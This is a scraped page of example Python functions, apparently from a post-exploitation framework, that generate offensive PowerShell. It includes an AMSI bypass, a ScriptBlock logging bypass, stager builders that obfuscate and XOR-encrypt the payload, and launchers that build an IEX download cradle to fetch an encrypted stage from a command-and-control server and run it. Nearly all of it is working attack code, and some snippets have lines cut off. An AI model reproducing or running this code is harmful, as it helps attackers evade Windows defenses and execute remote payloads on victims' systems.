Esempio n. 1
def AMSIBypass():
    # @mattifestation's AMSI bypass
    bypass = helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
    bypass += "'System.Management.Automation.Amsi'+'Utils'"
    bypass += helpers.randomize_capitalization(');$Ref.GetField(')
    bypass += "'amsiInitF'+'ailed','NonPublic,Static'"
    bypass += helpers.randomize_capitalization(").SetValue($null,$true);")
    return bypass.replace('\n', '').replace('    ', '')
Esempio n. 2
    def generate_stager(self,
        Generate the PowerShell stager that will perform
        key negotiation with the server and kick off the agent.

        TODO: variable name replacement to change up transport size
                ... other PowerShell obfuscation techniques?
        # read in the stager base
        f = open(self.installPath + "/data/agent/stager.ps1")
        stager =

        # make sure the server ends with "/"
        if not server.endswith("/"): server += "/"

        # patch the server and key information
        stager = stager.replace("REPLACE_SERVER", server)
        stager = stager.replace("REPLACE_STAGING_KEY", key)
        stager = stager.replace("index.jsp", self.stage1)
        stager = stager.replace("index.php", self.stage2)

        randomizedStager = ""

        for line in stager.split("\n"):
            line = line.strip()
            # skip commented line
            if not line.startswith("#"):
                # randomize capitalization of lines without quoted strings
                if "\"" not in line:
                    randomizedStager += helpers.randomize_capitalization(line)
                    randomizedStager += line

        if obfuscate:
            randomizedStager = helpers.obfuscate(
        # base64 encode the stager and return it
        if encode:
            return helpers.enc_powershell(randomizedStager)
        elif encrypt:
            # return an encrypted version of the stager ("normal" staging)
            return encryption.xor_encrypt(randomizedStager, key)
            # otherwise return the case-randomized stager
            return randomizedStager
Esempio n. 3
    def generate_stager(self, server, key, encrypt=True, encode=False):
        Generate the PowerShell stager that will perform
        key negotiation with the server and kick off the agent.

        TODO: variable name replacement to change up transport size
                ... other PowerShell obfuscation techniques?

        # read in the stager base
        f = open(self.installPath + "/data/agent/stager.ps1".replace('/', os.sep))
        stager =

        # make sure the server ends with "/"
        if not server.endswith(os.sep): server += "/"

        # patch the server and key information
        stager = stager.replace("REPLACE_SERVER", server)
        stager = stager.replace("REPLACE_STAGING_KEY", key)
        stager = stager.replace("index.jsp", self.stage1)
        stager = stager.replace("index.php", self.stage2)

        randomizedStager = ""

        for line in stager.split("\n"):
            line = line.strip()
            # skip commented line
            if not line.startswith("#"):
                # randomize capitalization of lines without quoted strings
                if "\"" not in line:
                    randomizedStager += helpers.randomize_capitalization(line)
                    randomizedStager += line

        # base64 encode the stager and return it
        if encode:
            return helpers.enc_powershell(randomizedStager)
        elif encrypt:
            # return an encrypted version of the stager ("normal" staging)
            return encryption.xor_encrypt(randomizedStager, key)
            # otherwise return the case-randomized stager
            return randomizedStager
Esempio n. 4
    def generate_stager_hop(self, server, key, encrypt=True, encode=False):
        Generate the PowerShell stager for hop.php redirectors that
        will perform key negotiation with the server and kick off the agent.

        # read in the stager base
        f = open(self.installPath + "./data/agent/stager_hop.ps1")
        stager =

        # patch the server and key information
        stager = stager.replace("REPLACE_SERVER", server)
        stager = stager.replace("REPLACE_STAGING_KEY", key)
        hosth = ""
        if self.headers:
            for h in self.headers:
                if 'Host' in h:
                    hosth = h[1]
        stager = stager.replace("REPLACE_HOST", hosth)
        stager = stager.replace("index.jsp", self.stage1)
        stager = stager.replace("index.php", self.stage2)

        randomizedStager = ""

        for line in stager.split("\n"):
            line = line.strip()
            # skip commented line
            if not line.startswith("#"):
                # randomize capitalization of lines without quoted strings
                if "\"" not in line:
                    randomizedStager += helpers.randomize_capitalization(line)
                    randomizedStager += line

        # base64 encode the stager and return it
        if encode:
            return helpers.enc_powershell(randomizedStager)
        elif encrypt:
            # return an encrypted version of the stager ("normal" staging)
            return encryption.xor_encrypt(randomizedStager, key)
            # otherwise return the case-randomized stager
            return randomizedStager
Esempio n. 5
    def generate_stager_hop(self, server, key, encrypt=True, encode=True):
        Generate the PowerShell stager for hop.php redirectors that 
        will perform key negotiation with the server and kick off the agent.

        # read in the stager base
        f = open(self.installPath + "./data/agent/stager_hop.ps1")
        stager =

        # patch the server and key information
        stager = stager.replace("REPLACE_SERVER", server)
        stager = stager.replace("REPLACE_STAGING_KEY", key)
        stager = stager.replace("index.jsp", self.stage1)
        stager = stager.replace("index.php", self.stage2)

        randomizedStager = ""

        for line in stager.split("\n"):
            line = line.strip()
            # skip commented line
            if not line.startswith("#"):
                # randomize capitalization of lines without quoted strings
                if "\"" not in line:
                    randomizedStager += helpers.randomize_capitalization(line)
                    randomizedStager += line
        # base64 encode the stager and return it
        if encode:
            return helpers.enc_powershell(randomizedStager)
        elif encrypt:
            # return an encrypted version of the stager ("normal" staging)
            return encryption.xor_encrypt(randomizedStager, key)
            # otherwise return the case-randomized stager
            return randomizedStager
Esempio n. 6
    def generate_launcher(self, listenerName, encode=True, userAgent="default", proxy="default", proxyCreds="default", stagerRetries="0"):
        Generate the initial IEX download cradle with a specified
        c2 server and a valid HTTP checksum.

        listenerName -> a name of a validly registered listener

        userAgent ->    "default" uses the UA from the default profile in the database
                        "none" sets no user agent
                        any other text is used as the user-agent
        proxy ->        "default" uses the default system proxy
                        "none" sets no proxy
                        any other text is used as the proxy


        # if we don't have a valid listener, return nothing
        if not self.mainMenu.listeners.is_listener_valid(listenerName):
            print helpers.color("[!] Invalid listener: " + listenerName)
            return ""

        # extract the staging information from this specified listener
        (server, stagingKey, pivotServer, hop, defaultDelay) = self.mainMenu.listeners.get_stager_config(listenerName)

        # if UA is 'default', use the UA from the default profile in the database
        if userAgent.lower() == "default":
            userAgent = self.userAgent

        if self.headers:
            headers = self.headers
            headers = ''
        # get the launching URI
        URI = self.generate_launcher_uri(server, encode, pivotServer, hop)

        stager = helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue = 0;")
        stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
        stager += "$u='"+userAgent+"';"

        if "https" in URI:
            # allow for self-signed certificates for https connections
            stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"

        if headers:
            for h in headers:
                stager += helpers.randomize_capitalization("$wc.Headers.Add('"+h[0]+"','" +h[1]+ "');")

        if userAgent.lower() != "none" or proxy.lower() != "none":

            if userAgent.lower() != "none":
                stager += helpers.randomize_capitalization("$wc.Headers.Add(")
                stager += "'User-Agent',$u);"

            if proxy.lower() != "none":
                if proxy.lower() == "default":
                    stager += helpers.randomize_capitalization("$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;")
                    # TODO: implement form for other proxy
                    stager += helpers.randomize_capitalization("$proxy = new-object net.WebProxy;")
                    stager += helpers.randomize_capitalization("$proxy.Address = '"+ proxy.lower() +"';")
                    stager += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
                if proxyCreds.lower() == "default":
                    stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
                    # TODO: implement form for other proxy credentials

        # the stub to decode the encrypted stager download by XOR'ing with the staging key
        stager += helpers.randomize_capitalization("$K=")
        stager += "'"+stagingKey+"';"

        if(stagerRetries == "0"):
            stager += helpers.randomize_capitalization("$i=0;[char[]]$b=([char[]]($wc.DownloadString(\"")
            stager += URI
            stager += helpers.randomize_capitalization("\")))|%{$_-bXor$k[$i++%$k.Length]};IEX ($b-join'')")
            # if there are a stager retries
            stager += helpers.randomize_capitalization("$R=%s;do{try{$i=0;[cHAR[]]$B=([cHAR[]]($WC.DoWNLOadSTriNg(\"" %(stagerRetries))
            stager += URI
            stager += helpers.randomize_capitalization("\")))|%{$_-bXor$k[$i++%$k.Length]};IEX ($b-join''); $R=0;}catch{sleep "+str(defaultDelay)+";$R--}} while ($R -gt 0)")

        # base64 encode the stager and return it
        if encode:
            return helpers.powershell_launcher(stager)
            # otherwise return the case-randomized stager
            return stager
Esempio n. 7
    def generate_launcher(self, listenerName, encode=True, userAgent="default", proxy="default", proxyCreds="default", stagerRetries="0"):
        Generate the initial IEX download cradle with a specified
        c2 server and a valid HTTP checksum.

        listenerName -> a name of a validly registered listener

        userAgent ->    "default" uses the UA from the default profile in the database
                        "none" sets no user agent
                        any other text is used as the user-agent
        proxy ->        "default" uses the default system proxy 
                        "none" sets no proxy
                        any other text is used as the proxy


        # if we don't have a valid listener, return nothing
        if not self.mainMenu.listeners.is_listener_valid(listenerName):
            print helpers.color("[!] Invalid listener: " + listenerName)
            return ""

        # extract the staging information from this specified listener
        (server, stagingKey, pivotServer, hop, defaultDelay) = self.mainMenu.listeners.get_stager_config(listenerName)

        # if UA is 'default', use the UA from the default profile in the database
        if userAgent.lower() == "default":
            userAgent = self.userAgent

        # get the launching URI
        URI = self.generate_launcher_uri(server, encode, pivotServer, hop)

        stager = helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
        stager += "$u='"+userAgent+"';"

        if "https" in URI:
            # allow for self-signed certificates for https connections
            stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
        if userAgent.lower() != "none" or proxy.lower() != "none":
            if userAgent.lower() != "none":
                stager += helpers.randomize_capitalization("$wc.Headers.Add(")
                stager += "'User-Agent',$u);"

            if proxy.lower() != "none":
                if proxy.lower() == "default":
                    stager += helpers.randomize_capitalization("$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;")
                    # TODO: implement form for other proxy
		    stager += helpers.randomize_capitalization("$proxy = new-object net.WebProxy;")
                    stager += helpers.randomize_capitalization("$proxy.Address = '"+ proxy.lower() +"';")
                    stager += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
                if proxyCreds.lower() == "default":
                    stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
                    # TODO: implement form for other proxy credentials

        # the stub to decode the encrypted stager download by XOR'ing with the staging key
        stager += helpers.randomize_capitalization("$K=")
        stager += "'"+stagingKey+"';"

        if(stagerRetries == "0"):
            stager += helpers.randomize_capitalization("$i=0;[char[]]$b=([char[]]($wc.DownloadString(\"")
            stager += URI
            stager += helpers.randomize_capitalization("\")))|%{$_-bXor$k[$i++%$k.Length]};IEX ($b-join'')")
            # if there are a stager retries
            stager += helpers.randomize_capitalization("$R=%s;do{try{$i=0;[cHAR[]]$B=([cHAR[]]($WC.DoWNLOadSTriNg(\"" %(stagerRetries))
            stager += URI
            stager += helpers.randomize_capitalization("\")))|%{$_-bXor$k[$i++%$k.Length]};IEX ($b-join''); $R=0;}catch{sleep "+str(defaultDelay)+";$R--}} while ($R -gt 0)")

        # base64 encode the stager and return it
        if encode:
            return helpers.powershell_launcher(stager)
            # otherwise return the case-randomized stager
            return stager
Esempio n. 8
def scriptBlockLogBypass():
    # ScriptBlock Logging bypass
    bypass = helpers.randomize_capitalization(
        "$" + helpers.generate_random_script_var_name("GPF") +
    bypass += "'System.Management.Automation.Utils'"
    bypass += helpers.randomize_capitalization(").\"GetFie`ld\"(")
    bypass += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
    bypass += helpers.randomize_capitalization(
        ");If($" + helpers.generate_random_script_var_name("GPF") + "){$" +
        helpers.generate_random_script_var_name("GPC") + "=$" +
        helpers.generate_random_script_var_name("GPF") +
        ".GetValue($null);If($" +
        helpers.generate_random_script_var_name("GPC") + "")
    bypass += "['ScriptB'+'lockLogging']"
    bypass += helpers.randomize_capitalization(
        "){$" + helpers.generate_random_script_var_name("GPC") + "")
    bypass += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
    bypass += helpers.randomize_capitalization(
        "$" + helpers.generate_random_script_var_name("GPC") + "")
    bypass += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
    bypass += helpers.randomize_capitalization(
    bypass += "('EnableScriptB'+'lockLogging',0);"
    bypass += helpers.randomize_capitalization("$val.Add")
    bypass += "('EnableScriptBlockInvocationLogging',0);"
    bypass += helpers.randomize_capitalization(
        "$" + helpers.generate_random_script_var_name("GPC") + "")
    bypass += "['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']"
    bypass += helpers.randomize_capitalization("=$val}")
    bypass += helpers.randomize_capitalization(
    bypass += "'signatures','N'+'onPublic,Static'"
    bypass += helpers.randomize_capitalization(
        ").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
    return bypass